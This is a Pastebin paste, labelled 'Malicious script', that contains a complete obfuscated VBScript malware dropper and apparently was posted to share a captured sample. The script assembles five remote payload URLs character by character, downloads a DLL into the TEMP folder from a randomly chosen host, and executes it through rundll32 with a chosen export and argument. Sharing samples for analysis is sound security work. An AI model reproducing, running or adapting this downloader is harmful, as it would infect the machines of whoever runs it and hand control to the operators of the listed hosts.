SHARE
TWEET

Malicious script

dynamoo Nov 1st, 2016 163 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. On Error Resume Next
  2. Const Jk7 = 1, RYg6 = 2, GEi = 8
  3. Const Og = 1, DVe = 2, Jg5 = "437", SJz8 = 2
  4. Function DNk(XJw8)
  5. Dim LFr, AEd3, HJx
  6. Set LFr = CreateObject("ADODB.Stream")
  7. LFr.type = DVe
  8. LFr.Charset = Jg5
  9. LFr.Open
  10. LFr.LoadFromFile XJw8
  11. HJx = LFr.ReadText
  12. LFr.Close
  13. DNk = Yj(HJx)
  14. End Function
  15. Sub CBj(XJw8, ZJe)
  16. Dim LFr, HJx
  17. Set LFr = CreateObject("ADODB.Stream")
  18. LFr.type = DVe
  19. LFr.Charset = Jg5
  20. LFr.Open
  21. HJx = Nj2(ZJe)
  22. LFr.WriteText HJx
  23. LFr.SaveToFile XJw8, SJz8
  24. LFr.Close
  25. End Sub
  26. Function Bs8(Wk9)
  27. Dim HJx, Dd8(0)
  28. If Wk9 <= 0 Then
  29. Err.Raise 50001, "", "123", "", 0
  30. ElseIf Wk9 = 1 Then
  31. Bs8 = Dd8
  32. Else
  33. HJx = Space(Wk9-1)
  34. Bs8 = Split(HJx, " ")
  35. End If
  36. End Function
  37. Function Zq6(url)
  38. Dim YDh, Bq0, AEd3, Bg
  39. Dim OBp, MEk(1)
  40. Set YDh = CreateObject("Scripting.FileSystemObject")
  41. MEk(0) = "WinHttp.WinHttpRequest.5.1"
  42. MEk(1) = "MSXML2.XMLHTTP"
  43. For Each OBp in MEk
  44. Err.Clear
  45. Set Bq0 = CreateObject(OBp)
  46. If Err.Number = 0 Then
  47. Exit For
  48. End If
  49. Next
  50. Bq0.Open "GET", url, False
  51. Bq0.Send
  52. AEd3 = Bs8(LenB(Bq0.ResponseBody))
  53. For Bg = 1 To LenB(Bq0.ResponseBody)
  54. AEd3(Bg-1) = AscB(MidB(Bq0.ResponseBody, Bg, 1))
  55. Next
  56. Zq6 = AEd3
  57. End Function
  58. Sub Ye( RFz5, DJc )
  59. Dim Bg, Rq5, YDh, Bq0, QPn5
  60. Set YDh = CreateObject( "Scripting.FileSystemObject" )
  61. If YDh.FolderExists( DJc ) Then
  62. QPn5 = YDh.BuildPath( DJc, Mid( RFz5, InStrRev( RFz5, "/" ) + 1 ) )
  63. ElseIf YDh.FolderExists( Left( DJc, InStrRev( DJc, "\" ) - 1 ) ) Then
  64. QPn5 = DJc
  65. Else
  66. Exit Sub
  67. End If
  68. Set Rq5 = YDh.OpenTextFile( QPn5, RYg6, True )
  69. Set Bq0 = CreateObject( "WinHttp.WinHttpRequest.5.1" )
  70. Bq0.Open "GET", RFz5, False
  71. Bq0.Send
  72. If LenB(Bq0.ResponseBody) < 100000 Or LenB(Bq0.ResponseBody) > 250000 Then
  73. Err.Raise 50011, "", "received shit", "", 0
  74. Exit Sub
  75. End If
  76. For Bg = 1 To LenB( Bq0.ResponseBody )
  77. Rq5.Write Chr( AscB( MidB( Bq0.ResponseBody, Bg, 1 ) ) )
  78. Next
  79. Rq5.Close( )
  80. End Sub
  81. Function UOh()
  82. Dim BRq, TBh, Be6
  83. Set BRq = CreateObject("WScript.Shell")
  84. Set TBh = BRq.Environment("System")
  85. Be6 = TBh("PROCESSOR_ARCHITECTURE")
  86. If LCase(Be6) = "amd64" Then
  87. UOh = BRq.ExpandEnvironmentStrings("%SystemRoot%\SysWOW64\rundll32.exe")
  88. Else
  89. UOh = BRq.ExpandEnvironmentStrings("%SystemRoot%\system32\rundll32.exe")
  90. End If
  91. End Function
  92. Sub UYw0(Wi, KBq, Hk4)
  93. Dim BRq, YDh, Rq5, WWp, Jx5
  94. Set BRq = CreateObject("WScript.Shell")
  95. Set YDh = CreateObject("Scripting.FileSystemObject")
  96. Set Rq5 = YDh.GetFile(Wi)
  97. WWp = Rq5.ShortPath
  98. Jx5 = UOh() + " " + WWp + "," + KBq + " " + Hk4
  99. If 2 > 1 Then
  100. BRq.Run(Jx5)
  101. End If
  102. End Sub
  103. Function Kf7(Wi)
  104. Dim YDh
  105. Set YDh = CreateObject("Scripting.FileSystemObject")
  106. Kf7 = YDh.FileExists(Wi)
  107. End Function
  108. Function Jq0(Wi)
  109. Dim YDh, Rq5
  110. Set YDh = CreateObject("Scripting.FileSystemObject")
  111. Set Rq5 = YDh.GetFile(Wi)
  112. Jq0 = Rq5.ShortPath
  113. End Function
  114. Function Ev6(Qt, UHs)
  115. Dim Wk9
  116. Wk9 = CDbl(Int(CDbl(Qt)/CDbl(UHs)))
  117. Ev6 = CDbl(Qt) - Wk9 * CDbl(UHs)
  118. End Function
  119. Function Vp(Gx, HJx)
  120. HJx(1) = 172 * HJx(1) Mod 30307
  121. HJx(0) = 171 * HJx(0) Mod 30269
  122. HJx(2) = 170 * HJx(2) Mod 30323
  123. Dim ZWw
  124. ZWw = Ev6((CDbl(HJx(0))/30269.0 + CDbl(HJx(1))/30307.0 + CDbl(HJx(2))/30323.0), 1.0)
  125. Vp = Int(ZWw * CDbl(Gx))
  126. End Function
  127. Function Va6(HAq3)
  128. Va6 = CInt(HAq3*Rnd())
  129. End Function
  130. Sub YXi0(Wc7)
  131. WScript.Sleep(Wc7)
  132. End Sub
  133. Randomize
  134. Dim EHi(2), EKj9, HZr(4), XJw8
  135. EHi(0) = 21898
  136. EHi(1) = 24911
  137. EHi(2) = 26762
  138. EKj9 = 50
  139. If 1=1 Then
  140. HZr(0) = "ht"&"tp://" & "5" & "1" & "q" & "u" & "d" & "u" & "." & "c" & "o" & "m" & "/" & "m" & "q" & "y" & "2" & "p" & "j" & "4"
  141. End If
  142. If 1=1 Then
  143. HZr(1) = "ht"&"tp://" & "b" & "j" & "z" & "s" & "t" & "." & "c" & "n" & "/" & "q" & "g" & "q" & "4" & "d" & "x"
  144. End If
  145. If 1=1 Then
  146. HZr(2) = "ht"&"tp://" & "d" & "a" & "n" & "a" & "p" & "a" & "r" & "d" & "a" & "z" & "." & "n" & "e" & "t" & "/" & "z" & "r" & "r" & "8" & "r" & "t" & "z"
  147. End If
  148. If 1=1 Then
  149. HZr(3) = "ht"&"tp://" & "l" & "i" & "t" & "c" & "h" & "l" & "o" & "p" & "e" & "r" & "." & "c" & "o" & "m" & "/" & "6" & "6" & "q" & "p" & "o" & "s" & "7" & "m"
  150. End If
  151. If 1=1 Then
  152. HZr(4) = "ht"&"tp://" & "z" & "i" & "z" & "z" & "h" & "a" & "i" & "d" & "a" & "." & "c" & "o" & "m" & "/" & "6" & "z" & "d" & "y" & "9" & "i" & "v" & "o"
  153. End If
  154. XJw8 = "TOHYDHko8jeC3IES"
  155. Dim BRq, Yt1, Vo, Xp1, Wc7
  156. Set objShell = CreateObject("WS"&"cript.Shell")
  157. Yt1 = objShell.ExpandEnvironmentStrings("%" & "T"&"EMP%")
  158. Dim CTu, Wf, YSj, ZVv6, Bg
  159. Wf = False
  160. For Bg=0 To 10: Do
  161. Vo = Yt1 + "\" + XJw8 + Chr(48+Bg) + ".dl"&"l"
  162. If Kf7(Vo) Then
  163. Xp1 = Jq0(Vo) & ".txt"
  164. If Kf7(Xp1) Then
  165. WScript.Quit(0)
  166. End If
  167. End If
  168. If Not Wf Then
  169. CTu = Va6(UBound(HZr))
  170. Ye HZr(CTu), Vo
  171. If Err.Number <> 0 Then
  172. Exit Do
  173. End If
  174. Wf = True
  175. End If
  176. UYw0 Vo, "A"&"d"&"vancedStoragePasswordConfig", "1"&"47"
  177. WScript.Quit(1)
  178. Loop While False: Next
  179. If 3=3 Then
  180. WScript.Quit(1)
  181. End If
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top